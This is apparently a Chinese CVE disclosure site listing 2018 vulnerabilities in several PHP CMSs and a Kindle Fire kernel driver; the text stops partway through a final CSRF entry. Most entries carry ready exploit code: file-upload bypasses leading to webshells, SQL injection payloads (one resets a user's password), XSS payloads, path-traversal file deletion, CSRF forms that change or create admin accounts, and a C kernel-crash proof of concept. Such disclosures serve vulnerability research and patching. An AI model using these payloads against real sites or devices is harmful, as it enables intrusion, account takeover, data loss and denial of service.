CVE中文申请站

CVE-2018-20129:DedeCMS V5.7 SP2前台文件上传漏洞

一、漏洞摘要

漏洞名称: DedeCMS V5.7 SP2前台文件上传漏洞
上报日期: 2018-12-11
漏洞发现者: 陈灿华
产品首页: http://www.dedecms.com/
软件链接: http://updatenew.dedecms.com/base-v57/package/DedeCMS-V5.7-UTF8-SP2.tar.gz
版本: DedeCMS V5.7 SP2正式版
CVE编号: CVE-2018-20129


二、漏洞概述

下载最新版本的dedecms源码,在本地安装完成后,打开会员登录功能,然后登录会员中心,来到如下界面,即访问链接:http://192.168.174.129/dedecms/uploads/member/content_list.php?channelid=1

4

在点击编辑器中的图片:

再点击上传按钮:

选择一张图片马文件,再点击上传到服务器上,抓包:将1.jpg改为1.jpg.p*hp即可绕过限制成功上传

上传成功后的文件名和文件位置如下:

使用菜刀访问,直接getshell



三、利用代码

exp代码如下:

POST /dedecms/uploads/include/dialog/select_images_post.php?CKEditor=body&CKEditorFuncNum=2&langCode=zh-cn HTTP/1.1
Host: 192.168.174.129
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.174.129/dedecms/uploads/member/article_add.php
Content-Type: multipart/form-data; boundary=---------------------------69781754626668
Content-Length: 11741
Cookie: DedeUserID=1; DedeUserID__ckMd5=c7ed3d18d15d23d0; DedeLoginTime=1544372582; DedeLoginTime__ckMd5=35d444f1976a147b; PHPSESSID=c84e97f6e66b4fd99b30f1dad1e02854; last_vtime=1544372941; last_vtime__ckMd5=22714ecc90820efa; last_vid=admin; last_vid__ckMd5=5c4160178ad81aa0; ENV_GOBACK_URL=%2Fdedecms%2Fuploads%2Fmember%2Fcontent_list.php%3Fchannelid%3D1
Connection: close
Upgrade-Insecure-Requests: 1

-----------------------------69781754626668
Content-Disposition: form-data; name="upload"; filename="1.jpg.p*hp"
Content-Type: image/jpeg


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/88/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20129
exploit-db:发布中

CVE-2018-20128:UsualToolCMS v8.0后台任意文件删除

一、漏洞摘要

漏洞名称: UsualToolCMS v8.0后台任意文件删除
上报日期: 2018-12-08
漏洞发现者: Krypton
产品首页: https://cms.usualtool.com/
软件链接: https://cms.usualtool.com/
版本: 8.0
CVE编号: CVE-2018-20128


二、漏洞概述

漏洞位于cmsadmin\a_sqlback.php的第74-88行,咱们贴上代码来看。
2018-12-06.12.18.29-image.png
74行的if用来判断$_POST['t']的值是不是为del,如果不是,则进入82-83行的假区间,echo 一句无法删除。如果是del则进入真区间

进入真区间后,75行,将$_POST()函数接收到的$backname赋值给$backname

76行用count()函数将$backname的个数做了统计赋值给$backnamenum,

随后进入for循环将$backnamenum进行遍历并且获取他的每个文件名。然后赋值给$sqlback,之后进入79行的if判断,通过自己的一个函数去检查$sqlback,我们跟进这个函数

class/UsualToolCMS_INC.php138-142行是他的contain函数执行的操作。
2018-12-06.12.29.29-image.png
可以看到他是做的一个字符串分割且判断是否数量>1,满足则return true 否则return else ,

然后继续查看一下unlinkFile的函数,看一下他的代码是做了什么事情
2018-12-06.12.34.15-image.png
判断文件是否存在 ,存在则删除,且return true 否则return false

然后cmsadmin\a_sqlback.php的代码就全部跑完了,在审查的过程中,并没有对其文件名和目录做出限制,于是可以构造成一个任意文件删除漏洞

三、利用过程

来到数据库备份的地方
2018-12-06.12.39.44-image.png
然后burp抓包,得到数据包如下
2018-12-06.12.41.01-image.png
然后我们在本机网站存放的磁盘下新建一个文件1.txt ,将数据包的backname参数改为../../../../../1.txt 并且发包看结果。

发包前:
2018-12-06.12.43.34-image.png
发包后:
burp的回显:
2018-12-06.12.44.46-image.png
电脑的效果:
2018-12-06.12.45.10-image.png

OK,可以看到 ,成功的删除了我们的1.txt文件,于是乎,这个任意文件删除是ok的

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/90/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20128
exploit-db:发布中

CVE-2018-20127:zzzphp cms 1.5.8 后台文件任意删除

一、漏洞摘要

漏洞名称: zzzphp cms 1.5.8 后台文件任意删除
上报日期: 2018-12-08
漏洞发现者: Krypton
产品首页: http://zzzcms.com/
软件链接: http://115.29.55.18/zzzphp.zip
版本: 1.5.8 正式版
CVE编号: CVE-2018-20127


二、漏洞概述

漏洞入口位于/admin/save.php文件下的第22
2018-12-07.09.29.30-image.png
switch判断传来的act的参数值,然后通过不同的值 return到不同的方法,进行文件的操作。我们追踪这个方法(del_file($path))。
phpstorm下选中函数名按住CTRL+SHIFT+F可以快速定位;然后给我定位到了inc/zzz_file.php511行,通过这文件名,可以猜出他是一个专门用来处理文件的php文件。
2018-12-07.09.40.45-image.png

然后分析一下这个方法里的代码,看他实现了什么功能。
这是一个有参数的方法,形参是$file,然后进入if判断,如果这个参数是nullreturn false ,513行判断是否是一个常规的文件,如果是则真区间的结果$file赋值给$file,如果并不是,就以根目录.文件的形式赋值给$file参数

然后进入第二个if,还是判断了文件,如果是文件 则进入下面代码,用file_ext($file)方法去对$file参数做了一个处理并讲结果赋值给$ext变量。这里对这个进行定位,看看他是怎么进行操作的。然后来到了第114
2018-12-07.09.55.09-image.png
看他的注释,就差不多知道是干什么的了,就是判断文件不包含. ,应该是用来防止目录跳跃的,可是他没限制路径,照样是可以任意文件删除,这是后话,知道这个方法是干嘛的,然后继续回到515行,继续往下读代码

再往下走又进入了一个if判断,他将$ext变量丢到in_array()方法,从array数组中去比较,是否有指定的几个后缀,如果有,return false 。这里貌似是限制了几个文件名,但是可以用方法绕过的...... ,好 ,继续往下看代码

又来到一个if,已经是最后一个if了,也其实没啥看的了 ,执行的删除功能。

现在按照审计的思路 去复现一下。

三、利用过程

来到后台文件管理--数据库备份
2018-12-07.10.33.19-image.png

首先备份数据库,然后删除处抓包,发到重放模块,点击Go,
2018-12-07.10.35.10-image.png
从数据包可以看出,他是根据路径来的,,审计的时候,已经避免了路径穿越,但是可以通过更改路径去进行任意文件删除
然后再看下文件是否存在
2018-12-07.10.35.51-image.png
已经删除了,现在在本机网站所在磁盘根目录新建一个txt文件和php文件,进行删除演示
2018-12-07.10.38.36-image.png

删除txt:
2018-12-07.10.39.24-image.png
2018-12-07.10.39.35-image.png

删除php:
2018-12-07.10.40.31-image.png

2018-12-07.10.40.40-image.png

可以看到都是可以删除的,前面审计的时候,限制了php,可以用x.phP.的方式进行删除文件。


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/89/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-20127
exploit-db:发布中

CVE-2018-19562:PHPok 4.9.015存在任意文件上传漏洞

一、漏洞摘要

漏洞名称: PHPok 4.9.015存在任意文件上传漏洞
上报日期: 2018-11-25
漏洞发现者: F0rmat
产品首页: https://www.phpok.com/
软件链接: https://www.phpok.com/24489.html
版本: 4.9.015
CVE编号: CVE-2018-19562


二、漏洞概述

该漏洞存在于“登录后台>程序升级->压缩包升级”
1.png
编辑一个测试文件phpinfo.php,压缩为phpinfo.zip上传。
2.png
把shell生成在主目录下面
3.png

三、利用代码

exp代码如下:
解压文件操作如下。

GET /admin.php?c=update&f=unzip&zipfile=_cache%2F8c9ae663e9d6ce4f.zip&_=1533515826187 HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
request_type: ajax
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Referer: http://127.0.0.1/admin.php?c=update&f=zip
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: hd_sid=aZY7Qf; hd_auth=f0c7B2JXp7hhumOhqeqELbZ5FJA3C%2FW2AKt4di3duYf1l5T%2BbkCMPFkWus2WrHfUg2Z8np8oM4VygPGWolgu; PHPSESSION=h4l9gblfbhu85v6sl543egc5d1
Connection: close


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/87/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19562
exploit-db:发布中

CVE-2018-19468:Hucart cms v5.7.4 SQL注入漏洞

一、漏洞摘要

漏洞名称: Hucart cms v5.7.4 SQL注入漏洞
上报日期: 2018-11-20
漏洞发现者: zzzzzzzz
产品首页: http://www.hucart.com/
软件链接: http://www.hucart.com/
版本: v5.7.4
CVE编号: CVE-2018-19468


二、漏洞概述

Hucart cms v5.7.4未对HTTP头部数据进行安全过滤,产生SQL注入漏洞。
文件system/class/helper_class.php第4-38行代码如下:
1.png
2.png
方法get_ip未对HTTP_X_FORWARDED_FOR等头内部的数据进行校验,并将其中的值作为IP地址直接返回,代码多处功能均调用此方法获取IP地址插入数据库,故产生多处SQL注入漏洞,其中一处如下:
文件application/user/login.php使用act_login方法处理普通用户登陆请求,如登陆成功,则对数据库进行更新,其具体实现位于81-101行,如下图:
3.png
代码于第83行调用get_ip方法获取IP地址$user_ip并于99行拼接入SQL语句中执行,故攻击者可在HTTP_X_FORWARDED_FOR等头内部插入攻击向量,发动SQL注入攻击。

三、利用代码

exp代码如下:
在HTTP_X_FORWARDED_FOR中插入SQL注入攻击向量即可,例如对于普通用户登陆界面处的注入漏洞,其请求如下:
攻击者即可通过注入漏洞修改任意用户密码,也可发动其他类型的SQL注入攻击。

POST /user/index.php?load=login&act=act_login HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.9 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/user/index.php?load=login&act=act
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Cookie: csrftoken=o2JPu6uSjJAMj0bgh2AB90bgd4igPjzCtfvrhP6jTFKpy87BxZfZIb31OqfJutMz; PHPSESSID=btl6d5bko1cd6voo5nshln498g; ck_num=a600bd172fcabd688500dac58ebda3a0
Connection: close
Upgrade-Insecure-Requests: 1
X-Forwarded-For: attack', use_pwd=md5('attack') Where use_name='test1' #

use_name=test&use_pwd=123456&use_captcha=asdasdd&submit=


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/83/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19468
exploit-db:发布中

CVE-2018-19083:WeCenter3.2.0-3.2.2储存型XSS

一、漏洞摘要

漏洞名称: WeCenter3.2.0-3.2.2储存型XSS
上报日期: 2018-11-02
漏洞发现者: Smi1e
产品首页: http://wenda.wecenter.com/
软件链接: http://wenda.wecenter.com/
版本: 3.2.0-3.2.2
CVE编号: CVE-2018-19083


二、漏洞概述

漏洞存在于WeCenter3.2.0/views/default/question/index.tpl.html中的第644,645,664,665行。
1.png
用户发布的问题标题经过htmlspecialchars_decode函数输出到了JS里,此处应该用htmlspecialchars() ,导致XSS漏洞。
2.png
当输入<script>alert(1)</script>后在浏览器渲染的时候,第一个</script>标签闭合了JS开头的<script>标签,从而从单引号中逃逸了出来,导致成功执行了JS代码。然后逃逸出来的单引号又闭合了下一个<script>前面的的单引号,从而导致弹窗了3次alert(1)。

三、利用代码

exp代码如下:

问题标题处输入:<script>alert(1)</script>
post数据包如下:
POST /WeCenter322/?/publish/ajax/publish_question/ HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 233
Cookie: lrs__Session=vvoutttrb79pa5fqgscqpdk0o2; lrs__user_login=6mdKXpYsXXBcYDxSW5FvDkK%2B%2FYr%2BIzrQEEpWa87z3kLrCBkGsZQpEnz%2FOiwHyE%2Fu5Xhn%2BqeLcDU3TT9%2Fppl1yXZclxcyrtHud9rR8EgfFyszWNY3cLkktjGsmh8Ae%2BiH
DNT: 1
Connection: close

post_hash=9e862174d7447bf2e73d591ee2090d42&attach_access_key=e91fee78235153fdff2f86281e8593e5&question_id=&ask_user_id=&category_id=1&question_content=%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&question_detail=&_post_type=ajax

3.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/76/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-19083
exploit-db:发布中

CVE-2018-18835:doccms 2016.5.12 后台模板getshell

一、漏洞摘要

漏洞名称: doccms后台模板getshell
上报日期: 2018-10-27
漏洞发现者: kr1sten
产品首页: http://www.doccms.com/
软件链接: http://www.doccms.com/?p=40
版本: 2016.5.12[正式版]
CVE编号: CVE-2018-18835


二、漏洞概述

后台模板上传位置 未检查上传内部的代码 导致getshell。

三、利用方法

登录后台发现后台具有上传功能,且限定了格式。
1.png

首先找到自带的模板的位置,然后复制一份改个名字,打包成压缩文件再上传的时候进行抓包 看其调用的方法,可以看到 burp抓取到的数据包已经显示出来了,从其中可以看到他调用了system文件夹下的changeskin.php这个文件的upload_template函数,于是我们定位到这个函数 看看他的代码是怎么样的逻辑。
4.png
5.png
从第八行开始到第三十一行之间 就是处理上传模板这个功能的代码逻辑,分析一下:
6.png

15-16行就是定义一个临时的保存路径:
7.png

17-29行,第一个if判断是不是一个zip文件,如果是文件就进入真区间进行下一步的判断,然后进行解压 如果解压成功就安装成功否则失败,如果不是zip文件就提示上传失败 最后重定向回模板管理的页面。代码中有一点没考虑到,只是判断是不是zip文件,并没有判断文件里面是不是有某些威胁的存在。于是可以在模板文件里面构造攻击代码,比如写一个一句话木马或者直接在模板文件的某php文件里面写入一句话木马代码。比如在原先的模板文件里面新建一个文件夹 此处叫做test文件夹,在里面新建一个php文件,写入<?php phpinfo();?> 然后在进行打包上传。
8.png
上传成功后,点击一下“应用到pc站” 然后去前台看效果。
10.png

直接访问模板url地址返回403错误码,说明模板目录访问权限控制。
11.png
通过修改原来模板文件里的index.php代码,比如在最前面加上一句phpinfo的代码,再重复上传-应用的步骤,前台效果如下:
12.png

代码成功的被执行了,换成一句话木马代码上传并应用,再用菜刀进行连接,如下:
14.png

四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/65/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18835
exploit-db:发布中

CVE-2018-18887:s-cms php ver 1.0新闻建站系统用户投稿处存在sql注入

一、漏洞摘要

漏洞名称: s-cms php ver 1.0新闻建站系统用户投稿处存在sql注入
上报日期: 2018-10-27
漏洞发现者: kr1sten
产品首页: https://www.s-cms.cn/
软件链接: https://shanlingtest.oss-cn-shenzhen.aliyuncs.com/file/6.news.php.zip
版本: php ver 1.0
CVE编号: CVE-2018-18887


二、漏洞概述

开启前台注册后,投稿发文章type参数存在SQL注入。


三、利用方法

漏洞存在位置:member/member_news.php
1.png
在8-11行 定义了一个变量去接受外部传参 变量名“$N_type”在本文件下搜索这个变量名逐个跟踪分析
2.png
这一段代码 是通过传来的参数进行判断文章是否通过审核,不理会 继续跟踪
3.png
87-93行 是将数据判断后显示在页面 继续跟踪
4.png
114行sql语句这里就有问题了,他是将变量拼接进入语句里 可控 我在115行将sql语句输出 看看页面是怎么样的
5.png
这是文章页面
6.png
然后 输入 and 1=1 和 and 1=2 看下页面的变化情况
7.png
可以看到 直接将用户输入的数据直接给拼接到sql语句了 直接去带入数据执行
下图是 and 1=2时的结果,两个图做一下对比 ,很明显的 下面的数据没有显示出来 也就是说明 这个地方是存在sql注入的
8.png
接下来 使用sqlmap 跑一下,此处要注意:必须要抓包进行post注入 不然没有cookie参数 sqlmap是无法进行注入的,看下图:
9.png
成功跑出数据库


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/75/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18887
exploit-db:发布中

CVE-2018-17129:Metinfo-6.1.2版本存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在SQL注入漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-17129


二、漏洞概述

漏洞存在于MetInfo6.1.2/app/system/feedback/admin/feedback_admin.class.php页面中,由于该页面的class1参数过滤不严,导致存在SQL注入漏洞。
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(0x3a,user(),0x3a)//from/**/information_schema.tables&met_fd_export=-1,访问后网站会导出一个excel表,excel表的名称为数据库用户名:
sqli.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(0x3a,user(),0x3a)/**/from/**/information_schema.tables&met_fd_export=-1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/54/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129
exploit-db:发布中

CVE-2018-18296:Metinfo-6.1.2版本存在XSS漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在XSS漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-18296


二、漏洞概述

漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e即可执行跨站脚本
xss.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/52/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296
exploit-db:发布中

CVE-2018-11021:Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞

一、漏洞摘要

漏洞名称: Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞
上报日期: 2018-10-10
漏洞发现者: 大兵
产品首页: http://www.amazon.com/
软件链接: https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2
版本: Fire OS 4.5.5.3
CVE编号: CVE-2018-11021


二、漏洞概述

Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。
三、利用代码

三、利用代码

exp代码如下:

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This Poc should run with permission to do ioctl on /dev/dsscomp.
 *
 * The fowllwing is kmsg of kernel crash infomation:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517; 

int main(int argc, char **argv, char **env) {
    unsigned int payload[] = {
    0xffffffff,
    0x00000003,
    0x5d200040,
    0x79900008,
    0x8f5928bd,
    0x78b02422,
    0x00000000,
    0xffffffff,
    0xf4c50400,
    0x007fffff,
    0x8499f562,
    0xffff0400,
    0x001b131d,
    0x60818210,
    0x00000007,
    0xffffffff,
    0x00000000,
    0x9da9041c,
    0xcd980400,
    0x001f03f4,
    0x00000007,
    0x2a34003f,
    0x7c80d8f3,
    0x63102627,
    0xc73643a8,
    0xa28f0665,
    0x00000000,
    0x689e57b4,
    0x01ff0008,
    0x5e7324b1,
    0xae3b003f,
    0x0b174d86,
    0x00000400,
    0x21ffff37,
    0xceb367a4,
    0x00000040,
    0x00000001,
    0xec000f9e,
    0x00000001,
    0x000001ff,
    0x00000000,
    0x00000000,
    0x0000000f,
    0x0425c069,
    0x038cc3be,
    0x0000000f,
    0x00000080,
    0xe5790100,
    0x5b1bffff,
    0x0000d355,
    0x0000c685,
    0xa0070000,
    0x0010ffff,
    0x00a0ff00,
    0x00000001,
    0xff490700,
    0x0832ad03,
    0x00000006,
    0x00000002,
    0x00000001,
    0x81f871c0,
    0x738019cb,
    0xbf47ffff,
    0x00000040,
    0x00000001,
    0x7f190f33,
    0x00000001,
    0x8295769b,
    0x0000003f,
    0x869f2295,
    0xffffffff,
    0xd673914f,
    0x05055800,
    0xed69b7d5,
    0x00000000,
    0x0107ebbd,
    0xd214af8d,
    0xffff4a93,
    0x26450008,
    0x58df0000,
    0xd16db084,
    0x03ff30dd,
    0x00000001,
    0x209aff3b,
    0xe7850800,
    0x00000002,
    0x30da815c,
    0x426f5105,
    0x0de109d7,
    0x2c1a65fc,
    0xfcb3d75f,
    0x00000000,
    0x00000001,
    0x8066be5b,
    0x00000002,
    0xffffffff,
    0x5cf232ec,
    0x680d1469,
    0x00000001,
    0x00000020,
    0xffffffff,
    0x00000400,
    0xd1d12be8,
    0x02010200,
    0x01ffc16f,
    0xf6e237e6,
    0x007f0000,
    0x01ff08f8,
    0x000f00f9,
    0xbad07695,
    0x00000000,
    0xbaff0000,
    0x24040040,
    0x00000006,
    0x00000004,
    0x00000000,
    0xbc2e9242,
    0x009f5f08,
    0x00800000,
    0x00000000,
    0x00000001,
    0xff8800ff,
    0x00000001,
    0x00000000,
    0x000003f4,
    0x6faa8472,
    0x00000400,
    0xec857dd5,
    0x00000000,
    0x00000040,
    0xffffffff,
    0x3f004874,
    0x0000b77a,
    0xec9acb95,
    0xfacc0001,
    0xffff0001,
    0x0080ffff,
    0x3600ff03,
    0x00000001,
    0x8fff7d7f,
    0x6b87075a,
    0x00000000,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    0x001001ff,
    0x00000000,
    0x00000001,
    0xff1f0512,
    0x00000001,
    0x51e32167,
    0xc18c55cc,
    0x00000000,
    0xffffffff,
    0xb4aaf12b,
    0x86edfdbd,
    0x00000010,
    0x0000003f,
    0xabff7b00,
    0xffff9ea3,
    0xb28e0040,
    0x000fffff,
    0x458603f4,
    0xffff007f,
    0xa9030f02,
    0x00000001,
    0x002cffff,
    0x9e00cdff,
    0x00000004,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }
        
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/50/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021
Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720
exploit-db:发布中

CVE-2018-18191:Finecms_v5.4存在CSRF漏洞可修改管理员账户密码

一、漏洞摘要

漏洞名称: Finecms_v5.4存在CSRF漏洞可修改管理员账户密码
上报日期: 2018-10-07
漏洞发现者: 踏月留香
产品首页: http://www.finecms.net/
软件链接: http://down.chinaz.com/soft/32596.htm
版本: 5.4
CVE编号: CVE-2018-18191


二、漏洞概述

恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="admin&#64;163&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="admin" />
      <input type="hidden" name="member&#91;phone&#93;" value="18888888888" />
      <input type="hidden" name="member&#91;password&#93;" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/49/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18191
exploit-db:发布中

CVE-2018-16416:FUELCMS 1.4存在CSRF可修改管理员账户密码

一、漏洞摘要

漏洞名称: FUELCMS 1.4存在CSRF可修改管理员账户密码
上报日期: 2018-08-25
漏洞发现者: 惜潮
产品首页: https://github.com/daylightstudio/FUEL-CMS
软件链接: https://github.com/daylightstudio/FUEL-CMS
版本: 1.4
CVE编号: CVE-2018-16416


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而更改管理员账户密码。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
   <input type="hidden" name="first_name" value="admin">
   <input type="hidden" name="last_name" value="admin">
   <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="Save" value="Save">
   <input type="hidden" name="language" value="english">
   <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/48/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16416
exploit-db:发布中

CVE-2018-12603:LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12603


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/44/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203899.html
exploit-db:发布中

CVE-2018-12602:LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户号
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12602


二、漏洞概述

攻击者可通过构造 CSRF 请求,来新增任意用户。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/43/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12602
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203740.html
exploit-db:发布中

CVE-2018-12114:maccms_v10存在CSRF漏洞可增加任意账号

一、漏洞摘要

漏洞名称: maccms_v10存在CSRF漏洞可增加任意账号
上报日期: 2018-06-11
漏洞发现者: Bay0net
产品首页: http://www.maccms.com/
软件链接: http://www.maccms.com/down.html
版本: v10
CVE编号: CVE-2018-12114


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
